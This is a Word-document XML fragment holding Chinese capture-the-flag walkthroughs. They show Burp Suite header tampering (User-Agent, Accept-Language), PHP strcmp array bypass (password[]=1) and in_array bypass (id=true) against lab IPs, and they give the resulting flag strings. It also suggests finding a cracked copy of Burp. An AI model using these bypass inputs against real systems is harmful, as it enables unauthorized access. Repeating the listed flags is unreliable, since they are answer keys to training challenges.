          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;https://portswigger.net/burp/download.html&gt;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，也可以找破解版。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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521821" cy="4097743"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="56" name="图片 56" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-21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209" cy="4112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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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设置好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burp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的监听地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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873949" cy="2501524"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="55" name="图片 55" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-27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628" cy="2518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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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设置浏览器的监听地址，点击选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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2905125" cy="5619750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="54" name="图片 54" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18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://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-31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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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如图设置浏览器的代理地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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541421" cy="4333391"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="53" name="图片 53" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-38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978" cy="434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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6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再次刷新网页，抓取网站数据包，如图标注出要修改的部分</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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7330748" cy="3093365"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="52" name="图片 52" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-45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8768" cy="310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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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lastRenderedPageBreak/>
        <w:t>步骤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7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把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User-Agent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修改为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opera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浏览器的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http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请求头，</w:t>
      </w:r>
      <w:r w:rsidRPr="00B8023C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Opera/9.80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(Windows NT6.1; WOW64; U; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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zh-cn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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) </w:t>
      </w:r>
      <w:r w:rsidRPr="00B8023C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Presto/2.10.229 Version/11.62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，如图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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66518" cy="1519472"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="51" name="图片 51" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-49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935" cy="1538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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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8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点击转发，将修改的数据包发出去，得到返回的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F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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334000" cy="2590800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50" name="图片 50" descr="http://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-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://192.168.109.235/storage/images/3e55c360bfe50af69a3ed796ba7f9db9/2018-12-07-15-18-55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DC9" w:rsidRPr="00F6440E" w:rsidRDefault="000E6DC9" w:rsidP="000E6DC9">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="000E6DC9">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1bc50c66677667a56c3208e06cf64159</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我要出国！出国！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176643" w:rsidRPr="00176643" w:rsidRDefault="009939AC" w:rsidP="00176643">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009939AC">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>d8016131a2724252b2419bf645aab221</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>抓包修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Accept-Language</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>en-US</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>协议</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1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/34,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通过访问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网站后，简单分析，且使用抓包工具修改包数据，找到其中的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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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打开谷歌浏览器，输入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'</w:t>
      </w:r>
      <w:hyperlink r:id="rId64" w:history="1">
        <w:r w:rsidRPr="00F6440E">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="4183C4"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://10.10.23.105/34/</w:t>
        </w:r>
      </w:hyperlink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'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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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438650" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="65" name="图片 65" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-34-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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-34-58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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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提示要用英语访问，可以通过抓包修改的方法，修改访问的语言，打开</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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，如果没有可以到官网下载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>https://portswigger.net/burp/download.html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，也可以找破解版。在本地环境中</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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ctf_tools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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文件夹中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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3547891" cy="2632889"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="64" name="图片 64" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-04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942" cy="2652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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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设置好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burp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的监听地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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091513" cy="2168310"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="63" name="图片 63" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-09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169" cy="2184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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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设置谷歌浏览器的监听地址，点击选项</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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2933700" cy="4352925"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="62" name="图片 62" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-14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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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如图设置浏览器的代理地址</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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613112" cy="2539817"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="61" name="图片 61" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-19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736" cy="255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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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6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刷新页面，获取数据包</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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768562" cy="2328892"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="60" name="图片 60" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-27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8274" cy="234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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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7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修改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Accept-Language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为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en-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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US,en;q</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=0.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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49244" cy="1867687"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="59" name="图片 59" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-31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541" cy="187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40E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440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点击两次转发，将数据包发送出去，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F6440E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F6440E" w:rsidRPr="00F6440E" w:rsidRDefault="00F6440E" w:rsidP="00F6440E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112652" cy="2680076"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="58" name="图片 58" descr="http://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-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://192.168.109.235/storage/images/3aef75a21ddbb1bc26f298830157eb4a/2018-12-10-10-35-35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91" cy="2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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ｆｌａｇ是什么呢？</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176643" w:rsidRPr="00176643" w:rsidRDefault="009939AC" w:rsidP="00176643">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009939AC">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>MSDJALSDJSDKSDSAASDJSKSKSKSKSKSKA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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F25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数数组绕过（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>password[]=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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25C21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F25C21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F25C21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F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/36,</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>函数传入数组绕过，输出</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21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F25C21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F25C21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F25C21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F25C21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F25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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F25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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25C2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25C2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F25C2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25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>打开火狐浏览器，输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21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&lt;http://192.168.15.28/36/&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21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F25C2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F25C2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F25C21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F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C2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724400" cy="2333625"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="67" name="图片 67" descr="http://192.168.109.235/storage/images/afce2e9d2ed811645c0ad38db5143e6d/2018-12-10-14-22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://192.168.109.235/storage/images/afce2e9d2ed811645c0ad38db5143e6d/2018-12-10-14-22-22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C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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25C2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25C2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F25C2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25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>http://192.168.15.28/36/?password[]=1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21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F25C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="微软雅黑" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="24292E"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，传入数组造成报错，得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00F25C21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F25C21" w:rsidRPr="00F25C21" w:rsidRDefault="00F25C21" w:rsidP="00F25C21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442327" cy="1167496"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="66" name="图片 66" descr="http://192.168.109.235/storage/images/afce2e9d2ed811645c0ad38db5143e6d/2018-12-10-14-23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://192.168.109.235/storage/images/afce2e9d2ed811645c0ad38db5143e6d/2018-12-10-14-23-12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640" cy="118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A80" w:rsidRDefault="001D1A80" w:rsidP="003D30B4">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找呀～找呀～找不到！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00176643" w:rsidRPr="00176643" w:rsidRDefault="009939AC" w:rsidP="00176643">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="009939AC">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>4c3cbcadf7b8a9ae2932afc00560a0d6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>传一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id=true</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>In_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数绕过</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数利用</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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/37,In_array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函数绕过，传一个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id=true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的值就可以了，找到其中的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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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C11E6C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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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打开火狐浏览器，输入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 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C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&lt;http://192.168.15.28/37/&gt;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地址以真实获取到的为准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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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325395" cy="2434687"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="69" name="图片 69" descr="http://192.168.109.235/storage/images/86375ac588231607b3bb58e95719c19b/2018-12-10-14-38-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://192.168.109.235/storage/images/86375ac588231607b3bb58e95719c19b/2018-12-10-14-38-59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758" cy="244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E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6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lastRenderedPageBreak/>
        <w:t>步骤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在地址栏输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00C11E6C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&lt;http://192.168.15.28/37/?id=ture&gt;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，得到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C11E6C" w:rsidRPr="00C11E6C" w:rsidRDefault="00C11E6C" w:rsidP="00C11E6C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838825" cy="2924175"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
